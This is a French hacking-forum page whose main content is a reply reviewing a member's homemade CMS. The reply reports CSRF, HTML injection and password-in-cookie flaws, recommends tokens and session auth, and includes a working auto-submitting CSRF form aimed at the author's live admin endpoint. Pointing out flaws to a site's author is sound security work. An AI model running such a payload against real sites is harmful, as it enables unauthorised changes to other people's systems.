• STATISTIQUES
  • Il y a eu un total de 1 membres et 5417 visiteurs sur le site dans les dernières 24h pour un total de 5 418 personnes!


    Membres: 2 444
    Discussions: 3 588
    Messages: 32 835
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [EN] osix
    Site de challenge qui utilise un système de level on chaque épreuve doit être réussie avant d'accéd�...
    Challenges
    [EN] Astalavista
    Un site aux ressources incontournable depuis plusieurs années, Astalavista est réellement devenue un cl...
    Hacking
    [FR] Forum-Webmaster
    Une communauté webmaster pour apporter / recevoir de l'aide en création de site internet. Webmaster...
    Webmaster
    [EN] Framework Metasploit
    Le Framework Metasploit est un logiciel gratuit, open source de tests de pénétration développ&ea...
    Vulnérabilités
    [EN] Reddit
    Subreddit dédié à la sécurité informatique.
    Hacking
    [FR] InfoMirmo
    Apprentissage de l'informatique par l'intermédiaire de challenges de sécurité. Venez app...
    Hacking
    [EN] CS Tutoring Center
    Site de challenge spécialisé dans les challenges de programmation C++ et java cependant, d'autres langages pe...
    Challenges

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
MyCMS
28-09-2012, 17h46 (Modification du message : 28-09-2012, 17h47 par kallimero.)
Message : #3
kallimero Hors ligne
Imbécile heureux
*



Messages : 37
Sujets : 2
Points: 4
Inscription : Aug 2011
RE: MyCMS
L'interface admin semble être atteinte d'une csrf (désolé d'avoir casser l'article en le testant), couplé a la possibilité d'injecter du html dans les news, et au stockage du mot de pass dans les cookies, il est très facile de pwn ton cms.

Utilise un système de token anti-csrf, et un autre système d'auth (par session par exemple).

Pour la csrf, j'ai utilisé ceci :
Code :
<body onload="document.forms[0].submit();">
<form method="post" action="http://overwr1t3.byethost31.com/admin/_modnews.php">
    <input type="hidden" name="titleBox" value="Pentest" >
    <input type="hidden" name="oldtitleBox" value="Pentest">
    <input type="hidden" name="newsBox" value="csrf test">
</form>
</body>


Pour modifier l'article pentest.
Avec un peu d'huile de coude, du js avec des timers et iframe, on peux imaginer un exploit en un lien.
+1 (1) -1 (0) Répondre


Messages dans ce sujet
MyCMS - par Swissky - 27-09-2012, 22h39
RE: MyCMS - par CyberSee - 27-09-2012, 23h12
RE: MyCMS - par kallimero - 28-09-2012, 17h46
RE: MyCMS - par kallimero - 28-09-2012, 18h45
RE: MyCMS - par Swissky - 28-09-2012, 22h24
RE: MyCMS - par EpicOut - 28-09-2012, 22h42
RE: MyCMS - par Swissky - 28-09-2012, 22h51
RE: MyCMS - par EpicOut - 28-09-2012, 22h52

Atteindre :


Utilisateur(s) parcourant ce sujet : 1 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut